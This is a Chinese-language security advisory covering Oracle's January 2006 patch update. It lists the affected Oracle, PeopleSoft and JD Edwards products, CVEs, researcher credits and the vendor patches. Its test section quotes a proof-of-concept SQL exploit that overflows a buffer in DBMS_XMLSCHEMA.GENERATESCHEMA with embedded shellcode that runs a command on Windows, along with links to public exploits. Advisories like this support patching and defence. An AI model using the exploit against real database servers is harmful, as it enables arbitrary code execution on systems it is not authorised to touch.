安全研究
安全漏洞
Oracle 2006年1月更新修复多个安全漏洞
发布日期:2006-01-17
更新日期:2007-02-26
受影响系统:
Oracle Application Server Release 2 10.1.2.0.2描述:
Oracle Application Server Release 2 10.1.2.0.1
Oracle Application Server Release 2 10.1.2.0.0
Oracle Application Server 10g 9.0.4.2
Oracle Application Server 10g 9.0.4.1
Oracle Application Server 10g 9.0.4
Oracle Application Server 10g 10.1.2
Oracle Oracle 9i Application Server Release 1 1.0.2.2
Oracle Oracle8 8.1.7.4
Oracle Oracle8 8.0.6.3
Oracle Oracle8 8.0.6
Oracle Oracle8i Standard Edition 8.1.7.4
Oracle Oracle8i Standard Edition 8.0.6.3
Oracle Oracle8i Standard Edition 8.0.6
Oracle Oracle8i Enterprise Edition 8.1.7.4
Oracle Oracle8i
Oracle Oracle9i Standard Edition 9.2.0.7
Oracle Oracle9i Standard Edition 9.2.0.6
Oracle Oracle9i Enterprise Edition 9.0.1.5 FIP
Oracle Oracle9i Enterprise Edition 9.0.1.5
Oracle Oracle9i Enterprise Edition 9.0.1.4
Oracle Oracle9i Application Server 1.0.2.2
Oracle E-Business Suite 11i 11.5.1 - 11.5.10
Oracle Oracle10g Application Server 9.0.4.2
Oracle Oracle10g Application Server 9.0.4.1
Oracle Oracle10g Application Server 10.1.2.1.0
Oracle Oracle10g Application Server 10.1.2.0.2
Oracle Oracle10g Application Server 10.1.2.0.1
Oracle Oracle10g Application Server 10.1.2
Oracle Oracle10g Enterprise Edition 10.1.0.4
Oracle Oracle10g Enterprise Edition 10.1.0.3
Oracle Oracle10g Personal Edition 10.1.0.4
Oracle Oracle10g Personal Edition 10.1.0.3
Oracle Oracle10g Standard Edition 10.2.0.1
Oracle Oracle10g Standard Edition 10.1.0.5
Oracle Oracle10g Standard Edition 10.1.0.4.2
Oracle Oracle10g Standard Edition 10.1.0.4
Oracle Oracle10g Standard Edition 10.1.0.3
Oracle Enterprise Manager Grid Control 10g 10.1.0.4
Oracle Enterprise Manager Grid Control 10g 10.1.0.3
Oracle Workflow 11.5.9.5
Oracle Workflow 11.5.1
Oracle Developer Suite 9.0.4.2
Oracle Developer Suite 9.0.4.1
Oracle Developer Suite 9.0.2.1
Oracle Developer Suite 10.1.2
Oracle JD Edwards EnterpriseOne/OneWorld XE, SP23_L1
Oracle JD Edwards EnterpriseOne/OneWorld XE, 8.95_F1
PeopleSoft Enterprise Portal 8.9
PeopleSoft Enterprise Portal 8.8
PeopleSoft Enterprise Portal 8.4
Oracle Collaboration Suite Release 2 9.0.4.2
Oracle Collaboration Suite Release 1 10.1.2
Oracle Collaboration Suite Release 1 10.1.1
BUGTRAQ ID: 16287
CVE ID: CVE-2006-0283,CVE-2006-0270,CVE-2006-0265,CVE-2005-2378,CVE-2005-2371,CVE-2005-2093,CVE-2005-0873
Oracle Database是一款商业性质大型数据库系统。
各种Oracle Database Server、Oracle Enterprise Manager、Oracle Application Server、Oracle Collaboration Suite、Oracle E-Business Suite、PeopleSoft Enterprise Portal、JD Edwards EnterpriseOne Tools、OneWorld Tools、Oracle Developer Suite和Oracle Workflow软件被发现多个漏洞影响。这些漏洞可能是本地或远程漏洞,影响Oracle产品的所有安全属性。攻击者可能利用这些漏洞破坏服务器的保密性、完整性或可用性,或执行任意代码。
<*来源:Raffaele Amendola
Cesar Cerrudo (cesarc56@yahoo.com)
Esteban Martinez Fayo
Joxean Koret (joxeankoret@yahoo.es)
Alexander Kornbrust (ak@red-database-security.com)
David Litchfield
Srinivas Nookala
Steve Orrin
Amichai Shulman (shulman@imperva.com)
链接:http://www.red-database-security.com/advisory/oracle_tde_wallet_password.html
http://www.red-database-security.com/advisory/oracle_reports_overwrite_any_file.html
http://www.red-database-security.com/advisory/oracle_reports_read_any_file.html
http://www.red-database-security.com/advisory/oracle_reports_read_any_xml_file.html
http://www.red-database-security.com/advisory/oracle_tde_unencrypted_sga.html
http://www.oracle.com/technology/deploy/security/pdf/cpujan2006.html
http://www.us-cert.gov/cas/techalerts/TA06-018A.html
http://www1.itrc.hp.com/service/cki/docDisplay.do?hpweb_printable=true&docId=c00593668
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Argeniss - Information Security
http://www.argeniss.com
info>at<argeniss>dot<com
Advisory: http://www.argeniss.com/research/ARGENISS-ADV-010601.txt
Proof of concept exploit code Oracle Database Buffer overflow vulnerability in public procedure DBMS_XMLSCHEMA.GENERATESCHEMA
http://www.argeniss.com/research.html
By Esteban Martinez Fayo (esteban>at<argeniss>dot<com)
Oracle version: 10g Release 1
Platform: Windows
Shellcode creates file c:\Unbreakable.txt and writes "ARE YOU SURE?"
*/
SELECT XDB.DBMS_XMLSCHEMA.GENERATESCHEMA ('a', 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDE' || chr(212)||chr(100)||chr(201)||chr(01)||chr(141)||chr(68)||chr(36)||chr(18)||chr(80)||chr(255)||chr(21)||chr(192)||chr(146)||chr(49)||chr(02)||chr(255)||chr(21)||chr(156)||chr(217)||chr(49)||chr(2)||chr(32)||'echo ARE YOU SURE? >c:\Unbreakable.txt') FROM DUAL;
http://www.milw0rm.com/exploits/3363
http://www.milw0rm.com/exploits/3377
建议:
厂商补丁:
HP
--
HP已经为此发布了一个安全公告(HPSBMA02094)以及相应补丁:
HPSBMA02094:SSRT061104 rev.1 - HP Oracle for OpenView (OfO) Critical Patch Update January 2006
链接:http://www1.itrc.hp.com/service/cki/docDisplay.do?hpweb_printable=true&docId=c00593668
Oracle
------
Oracle已经为此发布了一个安全公告(cpujan2006)以及相应补丁:
cpujan2006:Oracle Critical Patch Update - January 2006
链接:http://www.oracle.com/technology/deploy/security/pdf/cpujan2006.html?_template=/ocom/technology/cont
浏览次数:4482
严重程度:0(网友投票)
绿盟科技给您安全的保障